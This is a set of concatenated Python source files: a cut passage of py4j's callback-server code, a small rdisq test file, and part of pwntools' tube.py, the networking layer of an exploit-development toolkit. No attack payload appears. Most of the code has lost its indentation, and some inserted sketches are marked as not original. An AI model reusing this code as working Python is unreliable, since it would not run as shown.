if self.is_shutdown:
logger.info("Error while waiting for a connection.")
else:
server_connection_error.send(
self, error=e)
logger.exception("Error while waiting for a connection.")
server_stopped.send(self, server=self)
@classmethod
def _create_connection(cls, socket_instance, stream, pool, gateway_client,
callback_server_parameters, callback_server):
connection = CallbackConnection(
pool, stream, socket_instance, gateway_client,
callback_server_parameters, callback_server)
return connection
def close(self):
"""Closes all active callback connections
"""
logger.info("Closing down callback connections from CallbackServer")
with self.lock:
temp_connections = list(self.connections)
for connection in temp_connections:
quiet_close(connection)
def shutdown(self):
"""Stops listening and accepting connection requests. All live
connections are closed.
This method can safely be called by another thread.
"""
logger.info("Callback Server Shutting Down")
pre_server_shutdown.send(self, server=self)
with self.lock:
try:
if self.is_shutting_down:
# Do not allow calling shutdown while shutdown is
# executing. Alternative would be to not use a
# reentrant lock, but we
# would need to check all the other uses of this lock.
return
self.is_shutting_down = True
self.is_shutdown = True
quiet_shutdown(self.server_socket)
quiet_close(self.server_socket)
self.server_socket = None
temp_connections = list(self.connections)
for connection in temp_connections:
connection.close()
self.pool.clear()
finally:
self.is_shutting_down = False
self.thread.join()
self.thread = None
post_server_shutdown.send(self, server=self)
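# Illustrative sketch (not part of the original module): starting a gateway
# with an eagerly loaded callback server so that the JVM can call back into
# Python. port=0 asks for an ephemeral port, which can then be queried.
def _example_start_callback_server():
    gateway = JavaGateway(
        callback_server_parameters=CallbackServerParameters(port=0))
    return gateway.get_callback_server().get_listening_port()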
class CallbackConnection(Thread):
"""A `CallbackConnection` receives callbacks and garbage collection
requests from the Java side.
"""
def __init__(
self, pool, input, socket_instance, gateway_client,
callback_server_parameters, callback_server):
super(CallbackConnection, self).__init__()
self.pool = pool
self.input = input
self.socket = socket_instance
self.gateway_client = gateway_client
# TODO Remove in 1.0. Take it from the callback_server directly
self.callback_server_parameters = callback_server_parameters
if not callback_server_parameters:
# TODO Remove in 1.0. This should never be the case.
self.callback_server_parameters = CallbackServerParameters()
self.callback_server = callback_server
self.daemon = self.callback_server_parameters.daemonize_connections
    def end(self):
        """Forcibly stops this connection thread by asynchronously raising
        Py4JThreadCancelledError in it (uses the CPython-specific
        PyThreadState_SetAsyncExc API).
        """
        ret = ctypes.pythonapi.PyThreadState_SetAsyncExc(
            ctypes.c_long(self.ident),
            ctypes.py_object(Py4JThreadCancelledError))
        if ret == 0:
            raise ValueError("Invalid thread ID {}".format(self.ident))
        elif ret > 1:
            # More than one thread state was affected: revert the call.
            ctypes.pythonapi.PyThreadState_SetAsyncExc(
                ctypes.c_long(self.ident), None)
            raise SystemError("PyThreadState_SetAsyncExc failed")
def run(self):
logger.info("Callback Connection ready to receive messages, thread %d" % self.ident)
reset = False
authenticated = self.callback_server_parameters.auth_token is None
try:
while True:
command = smart_decode(self.input.readline())[:-1]
if not authenticated:
token = self.callback_server_parameters.auth_token
# Will raise an exception if auth fails in any way.
authenticated = do_client_auth(
command, self.input, self.socket, token)
continue
self.socket.sendall(("%d\n" % self.ident).encode("utf-8")) # send thread ident
if command.strip('\r') == proto.SERVER_STATUS_COMMAND_NAME:
info = self.build_info()
self.socket.sendall(
get_command_part(json.dumps(info))[1:].encode("utf-8")
)
reset = True
continue
if command.strip('\r') == proto.KILL_THREAD_COMMAND_NAME:
# retrieve the target thread ident
target_ident = int(smart_decode(self.input.readline())[:-1])
resp = proto.ERROR_RETURN_MESSAGE
# retrieve the target thread from the callback server connections
for connection in self.callback_server.connections:
if connection.ident == target_ident:
# and kill it if not dead
logger.info("Cancelling %d" % connection.ident)
connection.end()
resp = proto.SUCCESS_RETURN_MESSAGE
# reply
self.socket.sendall(resp.encode("utf-8"))
reset = True
continue
if command == '':
break
java_address = self.socket.getpeername()[0]
java_port = int(smart_decode(self.input.readline())[:-1])
if (self.gateway_client.address != java_address or
self.gateway_client.port != java_port):
# try to get a gateway client from pool
try:
_id = GatewaySessionPool.id_for(java_address, java_port)
if _id in self.callback_server.sessions_pool.keys():
session = self.callback_server.sessions_pool[_id]
logger.info("Reusing session : "+_id)
self.gateway_client = session.gateway_client
self.pool = session.pool
self.jvm = session.jvm
else:
logger.info("Creating a new connection session from "+str(java_address)+":"+str(java_port))
session = GatewayClient.build_new_session(java_address,
java_port,
self.gateway_client,
self.callback_server.pool)
self.callback_server.sessions_pool.put(session)
self.gateway_client = session.gateway_client
self.pool = session.pool
self.jvm = session.jvm
                    except Exception:
                        logger.exception("Error while setting up session")
                        raise
obj_id = smart_decode(self.input.readline())[:-1]
logger.info(
"Received command {0} on object id {1}".
format(command, obj_id))
if obj_id is None or len(obj_id.strip()) == 0:
break
if command == proto.CALL_PROXY_COMMAND_NAME:
return_message = self._call_proxy(obj_id, self.input)
self.socket.sendall(return_message.encode("utf-8"))
elif command == proto.GARBAGE_COLLECT_PROXY_COMMAND_NAME:
self.input.readline()
logger.info("Garbage collecting on %s" % str(obj_id))
_garbage_collect_proxy(self.pool, obj_id)
self.socket.sendall(
proto.SUCCESS_RETURN_MESSAGE.encode("utf-8"))
else:
logger.error("Unknown command {0}".format(command))
# We're sending something to prevent blocking, but at this
# point, the protocol is broken.
self.socket.sendall(
proto.ERROR_RETURN_MESSAGE.encode("utf-8"))
except Py4JAuthenticationError:
reset = True
logger.exception("Could not authenticate connection.")
except socket.timeout:
reset = True
logger.info(
"Timeout while callback connection was waiting for"
"a message", exc_info=True)
        except Py4JThreadCancelledError:
reset = True
logger.info("Request %d has been cancelled" % self.ident)
except Exception:
# This is a normal exception...
logger.info(
"Error while callback connection was waiting for"
"a message", exc_info=True)
self.close(reset)
def close(self, reset=False):
try:
logger.info("Closing down callback connection to %s" % str(self.socket.getpeername()))
except Exception:
logger.info("Closing down (dead?) connection")
if reset:
set_linger(self.socket)
else:
# Send shutdown before closing stream and socket
quiet_shutdown(self.socket)
quiet_close(self.input)
quiet_close(self.socket)
already_closed = self.socket is None
self.socket = None
self.input = None
if not already_closed:
server_connection_stopped.send(
self.callback_server, connection=self)
def _call_proxy(self, obj_id, input):
if obj_id not in self.pool:
return proto.RETURN_MESSAGE + proto.ERROR +\
get_command_part('Object ID unknown', self.pool)
try:
method = smart_decode(input.readline())[:-1]
params = self._get_params(input)
return_value = getattr(self.pool[obj_id], method)(*params)
return proto.RETURN_MESSAGE + proto.SUCCESS +\
get_command_part(return_value, self.pool)
except Exception as e:
logger.exception("There was an exception while executing the "
"Python Proxy on the Python Side.")
if self.callback_server_parameters.propagate_java_exceptions and\
isinstance(e, Py4JJavaError):
java_exception = e.java_exception
else:
java_exception = traceback.format_exc()
return proto.RETURN_MESSAGE + proto.ERROR +\
get_command_part(java_exception, self.pool)
def _get_params(self, input):
params = []
temp = smart_decode(input.readline())[:-1]
while temp != proto.END:
param = get_return_value("y" + temp, self.gateway_client)
params.append(param)
temp = smart_decode(input.readline())[:-1]
return params
def build_info(self):
info = {}
connections_shadow = []
connections_active = []
threads = sys._current_frames()
for connection in self.callback_server.connections:
connection_description = dict()
connection_description['id'] = str(connection)
connection_description['thread_name'] = connection.name
connection_description['thread_id'] = connection.ident
stack = traceback.extract_stack(threads.get(connection.ident))
connection_description['thread_stack'] = traceback.format_list(stack)
connection_description['gatewayClient'] = connection.gateway_client.build_info()
connection_description['address'] = connection.gateway_client.address
connection_description['port'] = connection.gateway_client.port
connection_description['nObjects'] = len(connection.pool)
connection_description['isAlive'] = connection.isAlive()
connection_description['pool'] = str(connection.pool)
connection_description['objects'] = connection.pool.build_objects_info()
if connection.isAlive():
connections_active.append(connection_description)
else:
connections_shadow.append(connection_description)
info['nConnections'] = len(self.callback_server.connections)
info['nActiveConnections'] = len(connections_active)
info['nShadowConnections'] = len(connections_shadow)
info['activeConnections'] = connections_active
#info['shadowConnections'] = connections_shadow
info_server = dict()
info_server['gatewayClient'] = self.gateway_client.build_info()
info_server['nObjects'] = len(self.pool)
info_server['objects'] = self.pool.build_objects_info()
info_server['pool'] = str(self.pool)
info_server['sessions_pool'] = self.callback_server.sessions_pool.build_info()
info['server'] = info_server
return info
class PythonProxyPool(object):
"""A `PythonProxyPool` manages proxies that are passed to the Java side.
A proxy is a Python class that implements a Java interface.
A proxy has an internal class named `Java` with a member named
`implements` which is a list of fully qualified names (string) of the
implemented interfaces.
The `PythonProxyPool` implements a subset of the dict interface:
`pool[id]`, `del(pool[id])`, `pool.put(proxy)`, `pool.clear()`,
`id in pool`, `len(pool)`.
The `PythonProxyPool` is thread-safe.
"""
def __init__(self):
self.lock = RLock()
self.dict = {}
self.next_id = 0
def put(self, object, force_id=None):
"""Adds a proxy to the pool.
:param object: The proxy to add to the pool.
:rtype: A unique identifier associated with the object.
"""
with self.lock:
if force_id:
id = force_id
else:
id = proto.PYTHON_PROXY_PREFIX + smart_decode(self.next_id)
self.next_id += 1
self.dict[id] = object
return id
def __getitem__(self, key):
with self.lock:
return self.dict[key]
def __delitem__(self, key):
with self.lock:
del(self.dict[key])
def clear(self):
with self.lock:
self.dict.clear()
def __contains__(self, key):
with self.lock:
return key in self.dict
def __len__(self):
with self.lock:
return len(self.dict)
def build_objects_info(self):
dict_objects = []
for key in self.dict.keys():
dict_objects.append({'id': key, 'obj': str(self.dict[key])})
return dict_objects
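# Illustrative sketch (not part of the original module): the proxy shape the
# pool expects. A Python class that declares the Java interfaces it
# implements (the interface name below is hypothetical) can be passed to the
# JVM, which will then call back into it through a CallbackConnection.
class _ExamplePythonListener(object):
    def notify(self, event):  # invoked from Java via a CALL_PROXY command
        return "python got: " + str(event)
    class Java:
        implements = ["com.example.Listener"]  # hypothetical interface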
# Basic registration
register_output_converter(
proto.REFERENCE_TYPE,
lambda target_id, gateway_client: JavaObject(target_id, gateway_client))
if PY4J_SKIP_COLLECTIONS not in os.environ or\
os.environ[PY4J_SKIP_COLLECTIONS].lower() not in PY4J_TRUE:
__import__("py4j.java_collections")
|
test_convenience_methods.py
|
"""Test convenience methods that save the need for stuff such as instantiating factories"""
from threading import Thread
from typing import *
from rdisq.request.receiver import RegisterMessage
from tests._messages import AddMessage
if TYPE_CHECKING:
from tests.conftest import _RdisqMessageFixture
def test_send_async(rdisq_message_fixture: "_RdisqMessageFixture"):
rdisq_message_fixture.spawn_receiver()
r = RegisterMessage(AddMessage, {}).send_async()
rdisq_message_fixture.process_all_receivers()
assert AddMessage in r.wait()
def test_send_sync(rdisq_message_fixture: "_RdisqMessageFixture"):
receiver = rdisq_message_fixture.spawn_receiver()
Thread(group=None, target=receiver.process).start()
assert AddMessage in RegisterMessage(AddMessage, {}).send_and_wait()
rdisq_message_fixture.kill_all()
|
tube.py
|
# -*- coding: utf-8 -*-
from __future__ import absolute_import
import logging
import re
import string
import subprocess
import sys
import threading
import time
from pwnlib import atexit
from pwnlib import term
from pwnlib.context import context
from pwnlib.log import Logger
from pwnlib.timeout import Timeout
from pwnlib.tubes.buffer import Buffer
from pwnlib.util import fiddling
from pwnlib.util import misc
from pwnlib.util import packing
class tube(Timeout, Logger):
"""
    Container of all the tube functions common to sockets, TTYs and SSH connections.
"""
default = Timeout.default
forever = Timeout.forever
#: Delimiter to use for :meth:`sendline`, :meth:`recvline`,
#: and related functions.
newline = '\n'
def __init__(self, timeout = default, level = None, *a, **kw):
super(tube, self).__init__(timeout)
Logger.__init__(self, None)
if level is not None:
self.setLevel(level)
self.buffer = Buffer(*a, **kw)
atexit.register(self.close)
# Functions based on functions from subclasses
def recv(self, numb = None, timeout = default):
r"""recv(numb = 4096, timeout = default) -> str
Receives up to `numb` bytes of data from the tube, and returns
as soon as any quantity of data is available.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Raises:
exceptions.EOFError: The connection is closed
Returns:
A string containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
Examples:
>>> t = tube()
>>> # Fake a data source
>>> t.recv_raw = lambda n: 'Hello, world'
>>> t.recv() == 'Hello, world'
True
>>> t.unrecv('Woohoo')
>>> t.recv() == 'Woohoo'
True
>>> with context.local(log_level='debug'):
... _ = t.recv() # doctest: +ELLIPSIS
[...] Received 0xc bytes:
'Hello, world'
"""
numb = self.buffer.get_fill_size(numb)
return self._recv(numb, timeout) or ''
def unrecv(self, data):
"""unrecv(data)
Puts the specified data back at the beginning of the receive
buffer.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: 'hello'
>>> t.recv()
'hello'
>>> t.recv()
'hello'
>>> t.unrecv('world')
>>> t.recv()
'world'
>>> t.recv()
'hello'
"""
self.buffer.unget(data)
def _fillbuffer(self, timeout = default):
"""_fillbuffer(timeout = default)
Fills the internal buffer from the pipe, by calling
:meth:`recv_raw` exactly once.
Returns:
The bytes of data received, or ``''`` if no data was received.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda *a: 'abc'
>>> len(t.buffer)
0
>>> t._fillbuffer()
'abc'
>>> len(t.buffer)
3
"""
data = ''
with self.local(timeout):
data = self.recv_raw(self.buffer.get_fill_size())
if data and self.isEnabledFor(logging.DEBUG):
self.debug('Received %#x bytes:' % len(data))
if len(set(data)) == 1 and len(data) > 1:
self.indented('%r * %#x' % (data[0], len(data)), level = logging.DEBUG)
elif all(c in string.printable for c in data):
for line in data.splitlines(True):
self.indented(repr(line), level = logging.DEBUG)
else:
self.indented(fiddling.hexdump(data), level = logging.DEBUG)
if data:
self.buffer.add(data)
return data
def _recv(self, numb = None, timeout = default):
"""_recv(numb = 4096, timeout = default) -> str
        Receives one chunk of data from the internal buffer, or from the OS
        if the buffer is empty.
"""
numb = self.buffer.get_fill_size(numb)
data = ''
# No buffered data, could not put anything in the buffer
# before timeout.
if not self.buffer and not self._fillbuffer(timeout):
return ''
return self.buffer.get(numb)
def recvpred(self, pred, timeout = default):
"""recvpred(pred, timeout = default) -> str
Receives one byte at a time from the tube, until ``pred(bytes)``
evaluates to True.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
pred(callable): Function to call, with the currently-accumulated data.
timeout(int): Timeout for the operation
Raises:
exceptions.EOFError: The connection is closed
Returns:
A string containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
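        Examples:
            >>> # Illustrative sketch (not from the original source), using
            >>> # the same fake recv_raw pattern as the other doctests.
            >>> t = tube()
            >>> t.recv_raw = lambda n: 'abcdefgh'
            >>> t.recvpred(lambda data: data.endswith('d'))
            'abcd'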
"""
data = ''
with self.countdown(timeout):
while not pred(data):
try:
res = self.recv(1)
except Exception:
self.unrecv(data)
return ''
if res:
data += res
else:
self.unrecv(data)
return ''
return data
def recvn(self, numb, timeout = default):
"""recvn(numb, timeout = default) -> str
        Receives exactly `numb` bytes.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Raises:
exceptions.EOFError: The connection closed before the request could be satisfied
Returns:
A string containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
Examples:
>>> t = tube()
>>> data = 'hello world'
>>> t.recv_raw = lambda *a: data
>>> t.recvn(len(data)) == data
True
>>> t.recvn(len(data)+1) == data + data[0]
True
>>> t.recv_raw = lambda *a: None
>>> # The remaining data is buffered
>>> t.recv() == data[1:]
True
>>> t.recv_raw = lambda *a: time.sleep(0.01) or 'a'
>>> t.recvn(10, timeout=0.05)
''
>>> t.recvn(10, timeout=0.06) # doctest: +ELLIPSIS
'aaaaaa...'
"""
# Keep track of how much data has been received
# It will be pasted together at the end if a
# timeout does not occur, or put into the tube buffer.
with self.countdown(timeout):
while self.countdown_active() and len(self.buffer) < numb and self._fillbuffer(self.timeout):
pass
if len(self.buffer) < numb:
return ''
return self.buffer.get(numb)
def recvuntil(self, delims, drop=False, timeout = default):
"""recvuntil(delims, timeout = default) -> str
Receive data until one of `delims` is encountered.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
        Arguments:
            delims(str,tuple): String of delimiter characters, or list of delimiter strings.
            drop(bool): Drop the ending. If :const:`True` it is removed from the end of the return value.
Raises:
exceptions.EOFError: The connection closed before the request could be satisfied
Returns:
A string containing bytes received from the socket,
or ``''`` if a timeout occurred while waiting.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: "Hello World!"
>>> t.recvuntil(' ')
'Hello '
>>> _=t.clean(0)
>>> # Matches on 'o' in 'Hello'
>>> t.recvuntil(tuple(' Wor'))
'Hello'
>>> _=t.clean(0)
>>> # Matches expressly full string
>>> t.recvuntil(' Wor')
'Hello Wor'
>>> _=t.clean(0)
>>> # Matches on full string, drops match
>>> t.recvuntil(' Wor', drop=True)
'Hello'
>>> # Try with regex special characters
>>> t = tube()
>>> t.recv_raw = lambda n: "Hello|World"
>>> t.recvuntil('|', drop=True)
'Hello'
"""
        # Convert string into a singleton tuple
if isinstance(delims, (str, unicode)):
delims = (delims,)
# Longest delimiter for tracking purposes
longest = max(map(len, delims))
# Cumulative data to search
data = []
top = ''
with self.countdown(timeout):
while self.countdown_active():
try:
res = self.recv(timeout=self.timeout)
except Exception:
self.unrecv(''.join(data) + top)
raise
if not res:
self.unrecv(''.join(data) + top)
return ''
top += res
start = len(top)
for d in delims:
j = top.find(d)
if start > j > -1:
start = j
end = j + len(d)
if start < len(top):
self.unrecv(top[end:])
if drop:
top = top[:start]
else:
top = top[:end]
return ''.join(data) + top
if len(top) > longest:
i = -longest - 1
data.append(top[:i])
top = top[i:]
return ''
def recvlines(self, numlines=2**20, keepends = False, timeout = default):
r"""recvlines(numlines, keepends = False, timeout = default) -> str list
Receive up to ``numlines`` lines.
A "line" is any sequence of bytes terminated by the byte sequence
set by :attr:`newline`, which defaults to ``'\n'``.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
numlines(int): Maximum number of lines to receive
keepends(bool): Keep newlines at the end of each line (:const:`False`).
timeout(int): Maximum timeout
Raises:
exceptions.EOFError: The connection closed before the request could be satisfied
        Returns:
            A list of the lines received so far, with the trailing newline of
            each line removed unless ``keepends`` is :const:`True`.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: '\n'
>>> t.recvlines(3)
['', '', '']
>>> t.recv_raw = lambda n: 'Foo\nBar\nBaz\n'
>>> t.recvlines(3)
['Foo', 'Bar', 'Baz']
>>> t.recvlines(3, True)
['Foo\n', 'Bar\n', 'Baz\n']
"""
lines = []
with self.countdown(timeout):
for _ in xrange(numlines):
try:
# We must set 'keepends' to True here so that we can
# restore the original, unmodified data to the buffer
# in the event of a timeout.
res = self.recvline(keepends=True, timeout=timeout)
except Exception:
self.unrecv(''.join(lines))
raise
if res:
lines.append(res)
else:
break
if not keepends:
lines = [line.rstrip(self.newline) for line in lines]
return lines
def recvline(self, keepends = True, timeout = default):
r"""recvline(keepends = True) -> str
Receive a single line from the tube.
A "line" is any sequence of bytes terminated by the byte sequence
set in :attr:`newline`, which defaults to ``'\n'``.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
keepends(bool): Keep the line ending (:const:`True`).
timeout(int): Timeout
Return:
All bytes received over the tube until the first
newline ``'\n'`` is received. Optionally retains
the ending.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: 'Foo\nBar\r\nBaz\n'
>>> t.recvline()
'Foo\n'
>>> t.recvline()
'Bar\r\n'
>>> t.recvline(keepends = False)
'Baz'
>>> t.newline = '\r\n'
>>> t.recvline(keepends = False)
'Foo\nBar'
"""
return self.recvuntil(self.newline, drop = not keepends, timeout = timeout)
def recvline_pred(self, pred, keepends = False, timeout = default):
r"""recvline_pred(pred, keepends = False) -> str
Receive data until ``pred(line)`` returns a truthy value.
Drop all other data.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
pred(callable): Function to call. Returns the line for which
this function returns :const:`True`.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: "Foo\nBar\nBaz\n"
>>> t.recvline_pred(lambda line: line == "Bar\n")
'Bar'
>>> t.recvline_pred(lambda line: line == "Bar\n", keepends=True)
'Bar\n'
>>> t.recvline_pred(lambda line: line == 'Nope!', timeout=0.1)
''
"""
tmpbuf = Buffer()
line = ''
with self.countdown(timeout):
while self.countdown_active():
try:
line = self.recvline(keepends=True)
except Exception:
self.buffer.add(tmpbuf)
raise
if not line:
self.buffer.add(tmpbuf)
return ''
if pred(line):
if not keepends:
line = line[:-len(self.newline)]
return line
else:
tmpbuf.add(line)
return ''
def recvline_contains(self, items, keepends = False, timeout = default):
r"""
Receive lines until one line is found which contains at least
one of `items`.
Arguments:
items(str,tuple): List of strings to search for, or a single string.
keepends(bool): Return lines with newlines if :const:`True`
timeout(int): Timeout, in seconds
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: "Hello\nWorld\nXylophone\n"
>>> t.recvline_contains('r')
'World'
>>> f = lambda n: "cat dog bird\napple pear orange\nbicycle car train\n"
>>> t = tube()
>>> t.recv_raw = f
>>> t.recvline_contains('pear')
'apple pear orange'
>>> t = tube()
>>> t.recv_raw = f
>>> t.recvline_contains(('car', 'train'))
'bicycle car train'
"""
if isinstance(items, (str,unicode)):
items = (items,)
def pred(line):
return any(d in line for d in items)
return self.recvline_pred(pred, keepends, timeout)
def recvline_startswith(self, delims, keepends = False, timeout = default):
r"""recvline_startswith(delims, keepends = False, timeout = default) -> str
        Keep receiving lines until one is found that starts with one of
        `delims`. Returns the matching line.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
Arguments:
delims(str,tuple): List of strings to search for, or string of single characters
keepends(bool): Return lines with newlines if :const:`True`
timeout(int): Timeout, in seconds
Returns:
The first line received which starts with a delimiter in ``delims``.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: "Hello\nWorld\nXylophone\n"
>>> t.recvline_startswith(tuple('WXYZ'))
'World'
>>> t.recvline_startswith(tuple('WXYZ'), True)
'Xylophone\n'
>>> t.recvline_startswith('Wo')
'World'
"""
        # Convert string into a singleton tuple
if isinstance(delims, (str, unicode)):
delims = (delims,)
return self.recvline_pred(lambda line: any(map(line.startswith, delims)),
keepends=keepends,
timeout=timeout)
def recvline_endswith(self, delims, keepends = False, timeout = default):
r"""recvline_endswith(delims, keepends = False, timeout = default) -> str
        Keep receiving lines until one is found that ends with one of
        `delims`. Returns the matching line.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
See :meth:`recvline_startswith` for more details.
Examples:
>>> t = tube()
>>> t.recv_raw = lambda n: 'Foo\nBar\nBaz\nKaboodle\n'
>>> t.recvline_endswith('r')
'Bar'
>>> t.recvline_endswith(tuple('abcde'), True)
'Kaboodle\n'
>>> t.recvline_endswith('oodle')
'Kaboodle'
"""
        # Convert string into a singleton tuple
if isinstance(delims, (str, unicode)):
delims = (delims,)
delims = tuple(delim + self.newline for delim in delims)
return self.recvline_pred(lambda line: any(map(line.endswith, delims)),
keepends=keepends,
timeout=timeout)
def recvregex(self, regex, exact = False, timeout = default):
"""recvregex(regex, exact = False, timeout = default) -> str
Wrapper around :func:`recvpred`, which will return when a regex
matches the string in the buffer.
By default :func:`re.RegexObject.search` is used, but if `exact` is
set to True, then :func:`re.RegexObject.match` will be used instead.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
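        Examples:
            >>> # Illustrative sketch (not from the original source). Note
            >>> # that the predicate is re-checked after every byte, so a
            >>> # greedy pattern may match less than expected.
            >>> t = tube()
            >>> t.recv_raw = lambda n: 'pid 1234 here'
            >>> t.recvregex(r'pid \d+')
            'pid 1'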
"""
if isinstance(regex, (str, unicode)):
regex = re.compile(regex)
if exact:
pred = regex.match
else:
pred = regex.search
return self.recvpred(pred, timeout = timeout)
def recvline_regex(self, regex, exact = False, keepends = False, timeout = default):
"""recvregex(regex, exact = False, keepends = False, timeout = default) -> str
Wrapper around :func:`recvline_pred`, which will return when a regex
matches a line.
By default :func:`re.RegexObject.search` is used, but if `exact` is
set to True, then :func:`re.RegexObject.match` will be used instead.
If the request is not satisfied before ``timeout`` seconds pass,
all data is buffered and an empty string (``''``) is returned.
"""
if isinstance(regex, (str, unicode)):
regex = re.compile(regex)
if exact:
pred = regex.match
else:
pred = regex.search
return self.recvline_pred(pred, keepends = keepends, timeout = timeout)
def recvrepeat(self, timeout = default):
"""recvrepeat(timeout = default) -> str
Receives data until a timeout or EOF is reached.
Examples:
>>> data = [
... 'd',
... '', # simulate timeout
... 'c',
... 'b',
... 'a',
... ]
>>> def delayrecv(n, data=data):
... return data.pop()
>>> t = tube()
>>> t.recv_raw = delayrecv
>>> t.recvrepeat(0.2)
'abc'
>>> t.recv()
'd'
"""
try:
while self._fillbuffer(timeout=timeout):
pass
except EOFError:
pass
return self.buffer.get()
def recvall(self, timeout=Timeout.forever):
"""recvall() -> str
Receives data until EOF is reached.
"""
with self.waitfor('Receiving all data') as h:
l = len(self.buffer)
with self.local(timeout):
try:
while True:
l = misc.size(len(self.buffer))
h.status(l)
if not self._fillbuffer():
break
except EOFError:
pass
h.success("Done (%s)" % l)
self.close()
return self.buffer.get()
def send(self, data):
"""send(data)
Sends data.
        If log level ``DEBUG`` is enabled, also prints out the data
        sent.
If it is not possible to send anymore because of a closed
connection, it raises ``exceptions.EOFError``
Examples:
>>> def p(x): print repr(x)
>>> t = tube()
>>> t.send_raw = p
>>> t.send('hello')
'hello'
"""
if self.isEnabledFor(logging.DEBUG):
self.debug('Sent %#x bytes:' % len(data))
if len(set(data)) == 1:
                self.indented('%r * %#x' % (data[0], len(data)), level = logging.DEBUG)
elif all(c in string.printable for c in data):
for line in data.splitlines(True):
self.indented(repr(line), level = logging.DEBUG)
else:
self.indented(fiddling.hexdump(data), level = logging.DEBUG)
self.send_raw(data)
def sendline(self, line=''):
r"""sendline(data)
Shorthand for ``t.send(data + t.newline)``.
Examples:
>>> def p(x): print repr(x)
>>> t = tube()
>>> t.send_raw = p
>>> t.sendline('hello')
'hello\n'
>>> t.newline = '\r\n'
>>> t.sendline('hello')
'hello\r\n'
"""
self.send(line + self.newline)
def sendlines(self, lines=[]):
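        """sendlines(lines)
        Shorthand for calling :meth:`sendline` on each element of ``lines``.
        """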
for line in lines:
self.sendline(line)
def sendafter(self, delim, data, timeout = default):
"""sendafter(delim, data, timeout = default) -> str
A combination of ``recvuntil(delim, timeout=timeout)`` and ``send(data)``.
"""
res = self.recvuntil(delim, timeout=timeout)
self.send(data)
return res
def sendlineafter(self, delim, data, timeout = default):
"""sendlineafter(delim, data, timeout = default) -> str
A combination of ``recvuntil(delim, timeout=timeout)`` and ``sendline(data)``."""
res = self.recvuntil(delim, timeout=timeout)
self.sendline(data)
return res
def sendthen(self, delim, data, timeout = default):
"""sendthen(delim, data, timeout = default) -> str
A combination of ``send(data)`` and ``recvuntil(delim, timeout=timeout)``."""
self.send(data)
return self.recvuntil(delim, timeout=timeout)
def sendlinethen(self, delim, data, timeout = default):
"""sendlinethen(delim, data, timeout = default) -> str
A combination of ``sendline(data)`` and ``recvuntil(delim, timeout=timeout)``."""
self.send(data + self.newline)
return self.recvuntil(delim, timeout=timeout)
def interactive(self, prompt = term.text.bold_red('$') + ' '):
"""interactive(prompt = pwnlib.term.text.bold_red('$') + ' ')
Does simultaneous reading and writing to the tube. In principle this just
connects the tube to standard in and standard out, but in practice this
is much more usable, since we are using :mod:`pwnlib.term` to print a
floating prompt.
        Thus it only works while in :data:`pwnlib.term.term_mode`.
"""
self.info('Switching to interactive mode')
go = threading.Event()
def recv_thread():
while not go.isSet():
try:
cur = self.recv(timeout = 0.05)
cur = cur.replace('\r\n', '\n')
if cur:
sys.stdout.write(cur)
sys.stdout.flush()
except EOFError:
self.info('Got EOF while reading in interactive')
break
t = context.Thread(target = recv_thread)
t.daemon = True
t.start()
try:
while not go.isSet():
if term.term_mode:
data = term.readline.readline(prompt = prompt, float = True)
else:
data = sys.stdin.read(1)
if data:
try:
self.send(data)
except EOFError:
go.set()
self.info('Got EOF while sending in interactive')
else:
go.set()
except KeyboardInterrupt:
self.info('Interrupted')
go.set()
while t.is_alive():
t.join(timeout = 0.1)
def stream(self, line_mode=True):
"""stream()
Receive data until the tube exits, and print it to stdout.
Similar to :func:`interactive`, except that no input is sent.
Similar to ``print tube.recvall()`` except that data is printed
as it is received, rather than after all data is received.
Arguments:
line_mode(bool): Whether to receive line-by-line or raw data.
Returns:
All data printed.
"""
buf = Buffer()
function = self.recvline if line_mode else self.recv
try:
while True:
buf.add(function())
sys.stdout.write(buf.data[-1])
except KeyboardInterrupt:
pass
except EOFError:
pass
return buf.get()
def clean(self, timeout = 0.05):
"""clean(timeout = 0.05)
Removes all the buffered data from a tube by calling
:meth:`pwnlib.tubes.tube.tube.recv` with a low timeout until it fails.
If ``timeout`` is zero, only cached data will be cleared.
Note: If timeout is set to zero, the underlying network is
not actually polled; only the internal buffer is cleared.
Returns:
All data received
Examples:
>>> t = tube()
>>> t.unrecv('clean me up')
>>> t.clean(0)
'clean me up'
>>> len(t.buffer)
0
"""
if timeout == 0:
return self.buffer.get()
return self.recvrepeat(timeout)
def clean_and_log(self, timeout = 0.05):
r"""clean_and_log(timeout = 0.05)
        Works exactly as :meth:`pwnlib.tubes.tube.tube.clean`, but logs received
        data at the ``DEBUG`` log level.
Returns:
All data received
Examples:
>>> def recv(n, data=['', 'hooray_data']):
... while data: return data.pop()
>>> t = tube()
>>> t.recv_raw = recv
>>> t.connected_raw = lambda d: True
>>> t.fileno = lambda: 1234
>>> with context.local(log_level='info'):
... data = t.clean_and_log() #doctest: +ELLIPSIS
[DEBUG] Received 0xb bytes:
'hooray_data'
>>> data
'hooray_data'
>>> context.clear()
"""
with context.local(log_level='debug'):
return self.clean(timeout)
def connect_input(self, other):
"""connect_input(other)
Connects the input of this tube to the output of another tube object.
Examples:
>>> def p(x): print x
